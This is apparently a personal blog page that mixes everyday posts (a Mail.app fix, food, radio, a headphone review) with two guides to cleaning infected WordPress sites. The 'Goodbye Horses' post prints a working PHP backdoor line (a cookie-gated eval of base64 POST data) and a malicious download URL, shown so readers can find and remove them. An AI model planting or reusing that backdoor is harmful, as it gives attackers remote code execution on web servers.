Jason Cosper

Blog

  • GrowlMail and Safari 4

    While I’m really happy with the Safari 4 beta, I was a little dismayed to find that Mail.app started dying shortly after the update. The system’s complaint was that GrowlMail was causing a problem that made Mail.app become hella unstable.

    So what was their suggestion?  Turn GrowlMail off until there was an update for it.  And that’s all well and good for most people — but since I hide my dock and am expected to pay at least a little bit of attention to my mail client at work, I’d rather not wait around for a fix.

    Fortunately, the Growl forums came up with a solution that requires only cutting and pasting a simple line into Terminal.app:

    defaults write com.apple.mail GMSummaryMode -int 2

    This can also be achieved by setting GrowlMail to display summaries instead of message excerpts.  If Mail.app keeps crashing on you tho, it’s a little hard to do that.

    So if you need a fix, now you’ve got one.

  • Goodbye Horses

    So I’ve been helping a few folks out with a Trojan that has been cropping up in a handful of WordPress installs as of late. Currently, it has been getting noticed by the good little girls and boys on Windows with virus scanners installed.  When visiting an infected site, most folks are being prompted to download: 

    http://gvatemal.biz/pfd/spl/pdf.pdf

    Don’t go there tho! The virus scanners identify the contents of that URL as JS:Packed-L, a packed JavaScript exploit.

    So how do you find out if your install has been hit?  Well, the ones I’ve been cleaning up all have the following bit of code right at the top of their main index.php

    <?php if(md5($_COOKIE['0bdcf3981272c15a'])=="23c8932280dcafe25c20c6d25c9c8660"){ eval(base64_decode($_POST['file'])); exit; } ?>

    If you see that floating around, get rid of it!  Once you’ve done that, clear out your site’s cache — if you’re using a caching plugin, that is — and you should be good to go.

    Should you not find that bit of code hanging around in your install’s index.php and there are people still complaining about it, I suggest getting shell access — so long as your web host is awesome and gives you that — and doing a recursive grep. At DreamHost, this is as easy as logging in and running:

    grep -R 0bdcf3981272c15a /home/user/example.com/*

    Of course you’ll want to replace “user” with your username and “example.com” with the domain — or folder if you broke from standard naming conventions — where WordPress is installed.  Give that command a few minutes to run and you should get a path of where that code snippet can be found.  All you have to do at that point is purge it and clear any cache you might have on your WP install.

    Of course, if you managed to get hit with this, it was because there was a hole in your WordPress install. Making sure your core install and plugins are up to date is always a great idea. I check mine daily — but even doing it once a week is better than most folks.

    All I’m saying is that you have to stay militant. Doing so will seriously prevent the headaches of having to deal with fixing this crap on a regular basis.

  • Underground Eats

    File under “things I didn’t know about 505 Flower before tonight”:

    • Despite almost everything else in the complex dropping their shutters after lunch, Saffron stays open until 9 PM.  So now I have an option other than Subway, Carl’s Jr., Famima, The Standard or Casey’s.  Even better is the fact that it’s Indian food.  Which I love.  So yay for Saffron!
    • Speaking of Famima, they’ve got a huge one hiding down there.  And it’s stocked better than the one off 6th and Grand.  Their refrigerator case had a pile of extra spicy tuna rolls, the steamer was loaded with bao and the shelves were brimming with a bunch of exotic Pocky.  Until the one right across the street from our building opens up, this totally is my new go-to Famima.

    You might think I’m easily swayed, but both of these things (along with the fact that Weiland serves Craftsman) have pretty much redeemed that bomb shelter of a food court for me.

  • Bye Bye, Indie

    Indie Logo

    A little more than five years after it fired up with a rather curious DJ-free playlist, Indie’s going off the airwaves in LA. And while I’ll miss being able to tune-in while driving around, I’m happy that they’re going to try to keep things going online.

    If I ever miss it enough while rolling thru my hood, at least I can load up Tuner on the iPhone and patch it into my car stereo. The quality may suffer a bit, but at least the reception will be a little bit better… ;)

    Update: Variety has a fantastic obit that does more than just regurgitate the closing statement plastered across the front page. If you listened to the station for even a few minutes, it’s worth a read.

    Update: According to an interview with Mr. Shovel over at The Daily Swarm the announcement running on the radio after every song is a little disingenuous:

    None of the primary DJs or music programmers at the station are involved in the website and it’s not being run by people who ran the station – there may be one person from the station. My concern is that people are confused. They are running an ad on the air saying we couldn’t play the corporate radio game anymore and that we didn’t want to change our format to be more mainstream and that we decided to play music on the web. But the guy making the announcement is the head of sales! God love him, he’s a good guy, but the staff of Indie had no control in the decision to shut down the station. I guess they had some success with the web and want to keep it going. But I don’t want the listeners to be confused.

    I listened to the web stream for a good portion of yesterday and they were still playing tracks from Check One…Two artists with pre-recorded bits from Mr. Shovel.  That just seems a little off to me.

  • Photoshoppery in the Real World

    Photoshop

    Pretty much every celebrity photo — save for the unflattering ones on gossip sites — is so heavily touched up nowadays that this bit of adbusting from Germany is freaking genius as far as I’m concerned.  And I don’t know about you, but all the detail that they put into this (like the layer list) really makes me wish that I’d see stuff like this pop up in the US more often.

  • Dear Natalie Portman,

    I consulted VW’s RoutanBabymaker3000, and it seems to think that we’d have great looking kids.  Don’t believe me?  Take a look for yourself:

    Portman/Cosper

    Now I know you’ve got a thing for quirky bearded dudes. Well, you might. For all I know, that was just a phase. Hopefully it wasn’t tho — because I’m way into college educated actresses with published research papers who aren’t afraid to shave their heads for a role.

    Anyhow, now that you know what our offspring would look like, you should drop me an email.  We don’t have to make babies right away, but maybe we can go record shopping or talk about Israel.  You know, just getting to know one another.  That would be nice, wouldn’t it?

    Okay, it’d probably be nicer for me than it would be for you.  But I swear that I’m a nice guy and not really that weird.  I mean, I might be weird enough to run your photo thru a website, but I’ll never send you a sweater made of my hair or anything.  That’s just bizarre…

  • Review: Nixon Nomadic Headphones

    I told myself that I was going to wait for the reviews before I rushed out and bought myself a pair of Nixon Nomadic headphones. Sure, the product page made them look dead sexy — but could they possibly live up to the marketing hype?

    2 weeks on, my patience was wearing thin. Not a single word had surfaced and I was getting antsy. No. I wasn’t going to give in. If they were good, I’d hear about it eventually. Patience is a virtue, and I was going to stick to my original plan.

    A week later, I had them in my grubby paws. Fuck patience. My want overruled any plans I might have had. And while I might be weak, at least I had a shiny new way to listen to music.

    So how are they? Surprisingly good, actually. The first handful of tracks that I listened to had the right amount of punch along with just enough nuance. Even the audiobook that I’m currently consuming sounded great.

    On top of that, they’re solidly built. The ball and socket joints manage to swivel freely while not getting too squirrelly and the memory foam ear pads contour quite nicely. The fact that the headphone cable detaches for easy packing and the right ear has an independent volume control built-in are just icing on the cake.

    Oh, did I mention these were iPhone compatible? No? Well, they are. And the mic, I’ve been told, sounds fantastic. Like a heavy one-inch button, there’s really no fumbling for it to change tracks or answer calls. Your hand just sort of gravitates to it.

    Other than feeling just a little tight on my Charlie Brown sized head, these are pretty much flawless. They’re seriously my new favorite headphones — and well worth the $120 I shelled out for them. If you’ve got the cash to burn, I highly recommend them.

  • Getting Thematic

    As I posted to Twitter earlier, I’ve decided to join the fray and shrug off new year’s resolutions by instead adopting a theme word for 2009.  My choice was:

    follow-through

    Why?  Well, to be honest, when it comes to follow-through, I’ve historically been sort of selective.  Get me working on something that I’m passionate about and I’ll concentrate on it almost purely.  But other things fall by the wayside while my OCD kicks in — and that’s a problem.

    I’ve become lethargic, unhealthy and chained to my desk.

    I’m letting relationships and friendships fall by the wayside while I concentrate on building a legacy.

    There are places that I wanted to see and things that I have wanted to do long before I managed to get this old.

    I’ve got laundry that is in dire need of attention.

    So with another step into my thirties a mere month away, I find myself at an interesting crossroads.  I can either stay on my present course or temper myself and make sweeping changes in the way that I do things.  But resolving to change one’s ways is always a slippery slope.  Old habits do die hard, after all.  This is where the idea of a theme word comes in tho.

    By choosing something as simple as “follow-through”, I can allow myself to see the things that need doing thru the year and work at them.  Hopefully, using that hyphenated mission statement as a mantra, it’ll keep me on task enough to make this year better than any previous one.

    So, what’s your theme word?

  • The Return of Eraserhead

    It might be a time for a trim when, after the company holiday party, your boss wanders into your office and says:

    Jason, it’s great to see you upright with your head on straight.  [long pause]  Your hair still must be drunk tho…

    Oh hat head, I hate you so.

  • WordPress, remv.php and You

    While hacked sites happen, the hacks are fairly benign.  Normally, folks with hacked sites see a few spam links at the bottom of their pages.  That sort of thing can normally be cleaned up with an upgrade.  When I have to deal with them, it also involves a rap on the knuckles and a lecture on the importance of staying on top of upgrades.

    I’ve never seen a hack crop up with the tenacity of “remv.php” tho.  Seriously, it’s kind of scary.

    I haven’t really had time to go over what all the “remv.php” script does, but I do know that it can be harnessed to send out DDoS (Distributed Denial of Service) attacks to unsuspecting sites.  How do I know this?  Well, about an hour after tossing in “They Live“, I hear Kitchen typing furiously and ask him what’s going on.

    There’s a site’s getting DDoS’ed — but the attack is coming from predominately from our own servers.

    Shit.  Was it a nasty 0-day worm?  Not so much.  Just a bunch of zombie blogs banging away at this poor bastard’s site.  And what did all those blogs have in common?  “remv.php” was hanging out in their “wp-content/themes” directory.

    So in the interest of spreading the word, I’ve got a quick and dirty guide to dealing with sites infected with this nasty little script.

    1. Check to see if your WordPress install has “remv.php” in its “wp-content/themes” directory.  This can be accomplished by adding “wp-content/themes/remv.php” to the end of your blog’s URL.  If you see “Access Denied – your host is not allowed to access this page.”, congratulations — you’re part of the problem.
    2. If you come up as clear on the previous step, you can always double check by FTP’ing into your server and navigating your directories manually.  The file always seems to show up at “wp-content/themes/remv.php”.  If it’s not there, you’re probably safe — but you should upgrade your WordPress install if it’s not the latest and greatest in order to defend yourself fully.
    3. Should you see the file after going over either of the first two steps, go delete “remv.php” while FTP’ed into your server.  Keep the client open tho.  You’re not done.
    4. Upgrade your WordPress install.  At the time of this post, the latest stable version is 2.7 and can be acquired directly from WordPress.org.  That’s sure to change as the years roll on tho, so just try to upgrade to whatever the site lists as “stable”.
    5. Go to your host and change the MySQL password that coincides with your WordPress database.  If you don’t know how to do this, contact the support staff of your host and have them walk you thru it.
    6. Modify the line in your “wp-config.php” file that reads:
      define('DB_PASSWORD', 'myoldpassword');
      There, replace “myoldpassword” with the new MySQL password.
    7. Log in to your WordPress admin area and visit “Users > Authors & Users” (that’s what it’s called in version 2.7).  From there, you can edit your users and set new passwords for all of them.  That’s right all of them. No slacking here!  If you stay on top of updates, this shouldn’t happen again.
    8. Go back to your FTP client (from step 3) and rename “wp-content/plugins” to something like “wp-content/plugins.bak”. Why you’re doing this should become apparent in the next step.
    9. While still in your WP admin interface, visit “Plugins > Installed” (again, this is the name for it in 2.7).  It’ll complain that it can’t find your plugins (because you renamed the directory) and deactivate them for you.  Once it’s deactivated them, use your FTP client to name the directory back to “wp-content/plugins” , refresh “Plugins > Installed” and upgrade all out-of-date plugins before re-activating them.
    10. You’re done!  Well, so long as you have only one infected WordPress blog.  If you’ve got more of them, then repeat these steps until everything is happy once again.

    If it seems like a lot of crap to go thru, just remember that this wouldn’t be an issue if you kept on top of security patches and made sure your plugins were up to date.  If you really want to avoid doing this again, subscribe to the WordPress Development Blog‘s feed and check it religiously.

    If you have any more info on “remv.php”, let me know in the comments and I’ll do what I can to keep this entry up to date.

    Update: It looks like “remv.php” is phpRemoteView.  Apparently, it’s pretty popular with the script kiddies, but it’s not the actual exploit that’s being used.  Still, it’s a bad thing that needs to be removed if you find it in your WordPress install.  If you’re interested in getting the gist of what the script is capable of, check out this page translation.